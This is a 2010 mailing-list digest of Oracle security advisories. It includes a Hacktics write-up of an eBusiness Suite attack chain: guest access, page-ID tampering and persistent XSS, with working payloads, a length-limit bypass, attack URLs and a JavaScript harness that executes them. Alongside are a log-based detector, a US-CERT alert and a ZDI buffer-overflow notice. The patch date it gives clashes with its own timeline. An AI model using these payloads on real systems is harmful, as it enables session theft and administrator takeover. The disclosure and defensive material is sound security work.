[guru] Oracle security updates
DATE: Tue, 19 Jan 2010 01:05:37 +0100
The January Oracle Critical Patch Update is out, fixing a total of 24
security vulnerabilities. Detailed write-ups of two of the issues have also
been published: in Oracle eBusiness Suite, certain components grant guest
access, the security checks are easy to bypass, and an XSS flaw was found as
well. The second group of issues affects the Oracle Secure Backup product,
where observiced.exe contains a stack buffer overflow.
--- Begin Message ---
Hacktics Research Group Security Advisory
http://www.hacktics.com/#details=;view=Resources%7CAdvisory
By Shay Chen, Hacktics.
14-Dec-2009
===========
I. Overview
===========
During a penetration test performed by Hacktics' experts, certain
vulnerabilities were identified in the Oracle eBusiness Suite deployment.
Further research identified several vulnerabilities which, combined, allow
an unauthenticated remote user to take full control of the administrative
web user account of the Oracle eBusiness Suite.
A friendly formatted version of this advisory, including a video
demonstrating step-by-step execution of the exploit, is available in:
http://www.hacktics.com/content/advisories/AdvORA20091214.html
===============
II. The Finding
===============
Three separate issues have been identified:
1. Unauthenticated Guest Access
-------------------------------
It is possible for unauthenticated users to access certain pages with guest
privileges (according to Oracle's security representative - this is a
standard functionality of this component). While some pages may not be
directly accessible as a guest in this manner, this can be bypassed by
taking advantage of the session management behavior in the application.
2. Authorization Bypass
-----------------------
Malicious users can access and manage content of other users, relying on the
lack of access control in the page management interface. Attackers can use
parameter tampering techniques to directly access the resource identifiers
of pages owned by other users, and delete or modify their content.
3. Persistent Cross Site Scripting
----------------------------------
Certain web interfaces in the user's menu management interface enable
attackers to inject malicious scripts into user-specific content, causing
the scripts to be executed in the browser of any user viewing the infected
content (Persistent Cross Site Scripting).
By combining all three vulnerabilities, an unauthenticated attacker can
first gain guest access, use it to reach pages belonging to the
administrative user, and inject malicious JavaScript into their content in
order to steal session identifiers, which allows taking over the
administrative user account.
============
III. Details
============
1. Unauthenticated Guest Access
--------------------------------
By accessing certain internal pages directly, attackers can cause the
application to grant them guest access and load certain objects into the
user's server-side session. At this point, the attacker is able to access
other internal components of the application as the guest user, including
management services, configuration interfaces and information-disclosing
components.
Unauthenticated attackers can bypass the login phase by directly accessing
certain internal URLs such as (partial list):
http://host:port/OA_HTML/OA.jsp
http://host:port/OA_HTML/RF.jsp
When one of these URLs is accessed, the system raises an exception and an
error is presented to the client. However, as part of that process, the JSP
code populates the user's session object with guest privileges. The
attacker can then access other pages in the system that allow guest
operations, such as:
http://host:port/OA_HTML/AppsChangePassword.jsp
http://host:port/pls/[DADName]/OracleMyPage.home
http://host:port/pls/[DADName]/icx_define_pages.editpagelist
2. Authorization Bypass
-----------------------
Various page management URLs in the Oracle eBusiness Suite rely on the
parameter named [p_page_id] to determine which page to manage. An attacker
can access the page of another user simply by changing that parameter to
the value identifying the other user's page. No authorization check
verifies that the user attempting the access actually owns the page.
The following proof-of-concept samples are provided (the [p_page_id] has to
be associated with a page of a valid user):
http://host:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://host:8888/pls/TEST/oracleconfigure.customize?p_page_id=1
3. Persistent Cross Site Scripting
----------------------------------
Various interfaces under the personal page management interface are
vulnerable to Persistent Cross Site Scripting:
http://host:port/pls/[DADName]/icx_define_pages.editpagelist
http://host:port/pls/[DADName]/oracleconfigure.customize?p_page_id=[page_id]
An attacker can inject malicious scripts into the various properties of a
new or existing page object (via submitted forms).
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=CREATE
The injected script will be executed when the user accesses the main URL:
http://host:port/pls/[DADName]/OracleMyPage.home
It is important to note that our testing has indicated that different
versions mitigate this vulnerability to different degrees, so in some
situations XSS evasion techniques are required to get past the input
validation and sanitization mechanisms:
* For earlier versions, injecting a simple <SCRIPT> tag suffices:
<SCRIPT>alert('XSS')</SCRIPT>
* Some versions limit the permitted characters, and thus require the tester
to insert JavaScript without using tags, by injecting into the text box a
string that breaks out of the JavaScript string in which the value is
embedded:
");alert('XSS');//
* Later versions appear to also enforce server-side length restrictions on
the vulnerable parameters. As a result, multiple separate injections are
required to achieve script execution, such as:
");/*
*/alert/*
*/(/*
*/'XSS'/*
*/);//
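The three payload shapes above all target the same thing: a page property that is echoed, unescaped, into a JavaScript string literal in the rendered page. The following is an added example written for this page, not code from the advisory or from Oracle. It models that situation with a hypothetical template (the setProp() call and the 10-character cap are assumptions for illustration) and shows why the quote breakout executes, why a server-side length cap breaks it into a syntax error, and why the comment-split fragments spread over several capped fields execute again. The hardened renderer shows the fix: emit the value as a proper JavaScript string literal.

```javascript
// Added example (not code from the advisory or from Oracle). Hypothetical
// page-management template that echoes each page property, unescaped, into a
// JavaScript string literal; the setProp() function name and MAX_LEN are
// assumptions for illustration.

// Vulnerable rendering: one setProp() call per property, value dropped
// straight into a double-quoted string.
function renderVulnerable(props) {
  return props.map((v, i) => `setProp(${i}, "${v}");`).join('\n');
}

// Hardened rendering: JSON.stringify() yields a JS string literal with quotes,
// backslashes and line terminators escaped, so the value stays data.
function renderHardened(props) {
  return props.map((v, i) => `setProp(${i}, ${JSON.stringify(v)});`).join('\n');
}

// Assumed server-side length restriction applied to each property.
const MAX_LEN = 10;
function enforceLength(props) {
  return props.map((v) => v.slice(0, MAX_LEN));
}

// Quote breakout from the advisory: closes the string and the call, then
// comments out the remainder of the template line.
const BREAKOUT = `");alert('XSS');//`;

// Comment-split variant from the advisory: every fragment fits the cap, and
// each one ends by opening a block comment that the next fragment closes, so
// the template text between the fields is swallowed by the comments.
const SPLIT = [`");/*`, `*/alert/*`, `*/(/*`, `*/'XSS'/*`, `*/);//`];

// Executes a rendered script with instrumented setProp()/alert() and reports
// what ran. A SyntaxError means the payload was broken rather than executed.
function execute(script) {
  const calls = [];
  let alerted = null;
  try {
    new Function('setProp', 'alert', script)(
      (i, v) => calls.push([i, v]),
      (msg) => { alerted = msg; },
    );
  } catch (e) {
    return { alerted, calls, error: e.name };
  }
  return { alerted, calls, error: null };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(execute(renderVulnerable([BREAKOUT])));                // alerted: 'XSS'
  console.log(execute(renderVulnerable(enforceLength([BREAKOUT])))); // error: 'SyntaxError'
  console.log(execute(renderVulnerable(enforceLength(SPLIT))));      // alerted: 'XSS'
  console.log(execute(renderHardened(SPLIT)));                       // alerted: null
}
```

The split trick only works because the template text between two injected fields contains no `*/` of its own; if it did, the comment would close early and the chain would fail. Note also that `JSON.stringify()` is only the right escaper for a JavaScript string context; a value echoed into HTML or into an attribute needs the encoder for that context instead.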
===========
IV. Exploit
===========
The exploit is performed by combining the three vulnerabilities, as
described in the following scenario:
A. Initially, an attacker gains guest access to the system, by first
accessing:
http://host:port/OA_HTML/OA.jsp
While an error is generated at this step, the attacker can proceed now to
the "My Homepage" page, which will now allow guest access:
http://host:port/pls/[DADName]/OracleMyPage.home
B. The attacker now goes to edit his personal homepage, by accessing the
"Edit Page List" URL:
http://host:port/pls/[DADName]/icx_define_pages.editpagelist
The attacker then selects his homepage, and clicks Rename (opening the
following URL):
http://host:port/pls/[DADName]/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=[page_id]
C. The attacker now changes the [p_page_id] to the [p_page_id] of the
victim's page (as this is an incremental ID, simple trial and error could be
used until the administrator's user page is identified).
D. The attacker then uses the Rename Form to change the name of the page
from its original name to an embedded script:
");alert('XSS');//
This script can now be replaced with the relevant payload, for instance, a
script that steals the session ID and sends it to the attacker.
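Seen from the server side, the scenario above leaves a recognisable trail in the web-server access log: a client hits /OA_HTML/OA.jsp (or RF.jsp), then walks the page-management URLs with one p_page_id value after another, which is what step C's trial-and-error search looks like. The following is an added example written for this page, not code from the advisory, that scans Common Log Format lines for that pattern. The log lines are constructed for illustration; the request paths are the ones listed in the advisory and the DAD name TEST comes from its sample URL.

```javascript
// Added example (not code from the advisory). Flags clients whose access-log
// trail matches the guest-session priming plus p_page_id enumeration chain.
// Sample log lines are constructed; the paths are those the advisory lists.

// Request paths that the advisory says populate the session with guest privileges.
const GUEST_PRIMERS = new Set(['/OA_HTML/OA.jsp', '/OA_HTML/RF.jsp']);

// Page-management entry points that take p_page_id without an ownership check.
const PAGE_MGMT = /^\/pls\/[^/]+\/(icx_define_pages\.DispPageDialog|oracleconfigure\.customize)$/;

// Common Log Format: client - - [timestamp] "METHOD path PROTO" status bytes
const CLF = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

function safeDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return s; }
}

// Returns {ip, ts, method, path, params, status}, or null for an unparsable line.
function parseLogLine(line) {
  const m = CLF.exec(line);
  if (!m) return null;
  const [path, query = ''] = m[4].split('?', 2);
  const params = {};
  for (const kv of query.split('&')) {
    if (!kv) continue;
    const [k, v = ''] = kv.split('=', 2);
    params[safeDecode(k)] = safeDecode(v);
  }
  return { ip: m[1], ts: m[2], method: m[3], path, params, status: Number(m[5]) };
}

// Flags every client that primed a guest session and afterwards touched at
// least `threshold` distinct p_page_id values on the page-management URLs.
function findEnumerators(lines, threshold = 3) {
  const clients = new Map();
  for (const line of lines) {
    const e = parseLogLine(line);
    if (!e) continue;
    let c = clients.get(e.ip);
    if (!c) {
      c = { primed: false, pageIds: new Set(), mgmtHits: 0 };
      clients.set(e.ip, c);
    }
    if (GUEST_PRIMERS.has(e.path)) { c.primed = true; continue; }
    if (c.primed && PAGE_MGMT.test(e.path)) {
      c.mgmtHits += 1;
      if ('p_page_id' in e.params) c.pageIds.add(e.params.p_page_id);
    }
  }
  const findings = [];
  for (const [ip, c] of clients) {
    if (c.primed && c.pageIds.size >= threshold) {
      findings.push({ ip, distinctPageIds: c.pageIds.size, mgmtHits: c.mgmtHits });
    }
  }
  return findings;
}

// Constructed sample: one client enumerating page IDs, one editing its own page.
const SAMPLE_LOG = [
  '203.0.113.7 - - [12/Jan/2010:10:00:01 +0100] "GET /OA_HTML/OA.jsp HTTP/1.1" 500 1834',
  '203.0.113.7 - - [12/Jan/2010:10:00:05 +0100] "GET /pls/TEST/OracleMyPage.home HTTP/1.1" 200 9120',
  '203.0.113.7 - - [12/Jan/2010:10:00:09 +0100] "GET /pls/TEST/icx_define_pages.editpagelist HTTP/1.1" 200 3311',
  '203.0.113.7 - - [12/Jan/2010:10:00:14 +0100] "GET /pls/TEST/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=1 HTTP/1.1" 200 2210',
  '203.0.113.7 - - [12/Jan/2010:10:00:17 +0100] "GET /pls/TEST/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=2 HTTP/1.1" 200 2214',
  '203.0.113.7 - - [12/Jan/2010:10:00:20 +0100] "GET /pls/TEST/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=3 HTTP/1.1" 200 2209',
  '203.0.113.7 - - [12/Jan/2010:10:00:23 +0100] "GET /pls/TEST/oracleconfigure.customize?p_page_id=4 HTTP/1.1" 200 5402',
  '198.51.100.4 - - [12/Jan/2010:10:02:40 +0100] "GET /OA_HTML/OA.jsp HTTP/1.1" 200 7710',
  '198.51.100.4 - - [12/Jan/2010:10:03:02 +0100] "GET /pls/TEST/icx_define_pages.DispPageDialog?p_mode=RENAME&p_page_id=42 HTTP/1.1" 200 2212',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(findEnumerators(SAMPLE_LOG)); // [{ ip: '203.0.113.7', distinctPageIds: 4, mgmtHits: 4 }]
}
```

Two caveats when using this against real logs. Every legitimate OA Framework user requests OA.jsp, so the priming step on its own is not an indicator; the signal is the number of distinct page IDs one client touches on the management URLs, which a user editing only his own pages never produces. And the rename form is submitted by POST, so the injected script itself does not appear in the access log; keying the grouping on a session cookie rather than the source address, where the log records one, avoids merging users behind a shared proxy.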
===================
V. Affected Systems
===================
This vulnerability was tested and identified in Oracle eBusiness Suite
versions 10 and 11.
==============================
VI. Vendor's Response/Solution
==============================
Oracle's security alerts group has been notified of this vulnerability in
early November.
According to Oracle, the first issue is not a vulnerability - guest access
is permitted by design. The other two have been acknowledged by Oracle, and
have been fixed in the Jan-2009 CPU:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html
It is important to note that the default fix for this vulnerability is a
script removing this interface (which is now replaced with a new OA
Framework). Customers unwilling or unable to switch to the new interface,
should apply patch 7567354 which, according to Oracle, fixes these
vulnerabilities on the obsolete packages (Hacktics has not performed tests
to verify this patch).
===========
VII. Credit
===========
These vulnerabilities were discovered by:
Shay Chen, Technical Leader, Security Services, Hacktics.
Additional Contribution:
Gil Cohen, Application Security Consultant, Hacktics.
Oren Hafif, Application Security Consultant, Hacktics.
---
Ofer Maor
CTO, Hacktics
Chairman, OWASP Israel
Web: www.hacktics.com
--- End Message ---
--- Begin Message ---
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
National Cyber Alert System
Technical Cyber Security Alert TA10-012A
Oracle Updates for Multiple Vulnerabilities
Original release date: January 12, 2010
Last revised: --
Source: US-CERT
Systems Affected
* Oracle Database 11g, version 11.1.0.7
* Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4
* Oracle Database 10g, version 10.1.0.5
* Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV
* Oracle Application Server 10g Release 3 (10.1.3), versions 10.1.3.4.0, 10.1.3.5, 10.1.3.5.1
* Oracle Application Server 10g Release 2 (10.1.2), version 10.1.2.3.0
* Oracle Access Manager versions 7.0.4.3, 10.1.4.2
* Oracle E-Business Suite Release 12, versions 12.0.4, 12.0.5, 12.0.6, 12.1.1 and 12.1.2
* Oracle E-Business Suite Release 11i, version 11.5.10.2
* PeopleSoft Enterprise HCM (TAM), versions 8.9 and 9.0
* Oracle WebLogic Server 10.0 through MP2, 10.3.0 and 10.3.1
* Oracle WebLogic Server 9.0 GA, 9.1 GA and 9.2 through 9.2 MP3
* Oracle WebLogic Server 8.1 through 8.1 SP6
* Oracle WebLogic Server 7.0 through 7.0 SP7
* Oracle JRockit R27.6.5 and earlier (JDK/JRE 6, 5, 1.4.2)
* Primavera P6 Enterprise Project Portfolio Management 6.1, 6.2.1 and 7.0
* Primavera P6 Web Services 6.2.1, 7.0 and 7.0SP1
Overview
Oracle products and components are affected by multiple
vulnerabilities. The impacts of these vulnerabilities include
remote execution of arbitrary code, information disclosure, and
denial of service.
I. Description
The Oracle Critical Patch Update Advisory - January 2010 addresses
24 vulnerabilities in various Oracle products and components. The
document provides information about affected components, access and
authorization required for successful exploitation, and the impact
from the vulnerabilities on data confidentiality, integrity, and
availability.
Oracle has associated CVE identifiers with the vulnerabilities
addressed in this Critical Patch Update. If significant additional
details about vulnerabilities and remediation techniques become
available, we will update the Vulnerability Notes Database.
II. Impact
The impact of these vulnerabilities varies depending on the
product, component, and configuration of the system. Potential
consequences include the execution of arbitrary code or commands,
information disclosure, and denial of service. Vulnerable
components may be available to unauthenticated, remote attackers.
An attacker who compromises an Oracle database may be able to
access sensitive information.
III. Solution
Apply the appropriate patches or upgrade as specified in the Oracle
Critical Patch Update Advisory - January 2010. Note that this
document only lists newly corrected issues. Updates to patches for
previously known issues are not listed.
IV. References
* Oracle Patch Update Advisory - January 2010 -
<http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html>
* Critical Patch Updates and Security Alerts -
<http://www.oracle.com/technology/deploy/security/alerts.htm>
* Map of Public Vulnerability to Advisory/Alert -
<http://www.oracle.com/technology/deploy/security/critical-patch-updates/public_vuln_to_advisory_mapping.html>
____________________________________________________________________
The most recent version of this document can be found at:
<http://www.us-cert.gov/cas/techalerts/TA10-012A.html>
____________________________________________________________________
Feedback can be directed to US-CERT Technical Staff. Please send
email to <cert@cert.org> with "TA10-012A Feedback VU#148385" in
the subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2010 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
January 12, 2010: Initial release
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (GNU/Linux)
iQEVAwUBS0zxEducaIvSvh1ZAQLpPgf/VVrk5FTcPFRdv3map88eLhgVIDpKdQmk
1yWuAcyx1vOjEgOeDrl/DYMoNXI0jjvZ+V2r3KA9J2jO0V77J1g5vwxz9uScaU7v
A4IW/Vv31T55IQmYrCsF6rtu/yhPIair2uiOFjc5xRqnoTsufhZ8wm8EBjnOElsV
8D+SjICgaOwh76WQGGJQK0kW2XkdSmGbu8a/Wwm4WvvZ1ngYeURCW32ZCiqdb+tu
gCaqHCELGBCfwx0CUaWsNIwqIWBkD61JN18rnM8XNkVQ61gkbvBMlMGM/WP5CaGh
epIa3qZafEbzd6iogajxUSxy37iFokKZl/2+5o8DE21QdEAE6iI8qA==
=TaF2
-----END PGP SIGNATURE-----
--- End Message ---
--- Begin Message ---
ZDI-10-002: Oracle Secure Backup observiced.exe Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-002
January 12, 2010
-- CVE ID:
CVE-2010-0072
-- Affected Vendors:
Oracle
-- Affected Products:
Oracle Secure Backup
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Oracle Secure Backup. Authentication is not
required to exploit this vulnerability.
The specific flaw exists in the Oracle Secure Backup Services daemon,
observiced.exe, which listens on TCP port 10000 by default. Because the
reverse lookup performed on connections to that port lacks bounds
checking, a stack overflow can occur, leading to a complete compromise of
the affected system under the credentials of the SYSTEM account.
-- Vendor Response:
Oracle has issued an update to correct this vulnerability. More
details can be found at:
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html
-- Disclosure Timeline:
2009-04-20 - Vulnerability reported to vendor
2010-01-12 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
--- End Message ---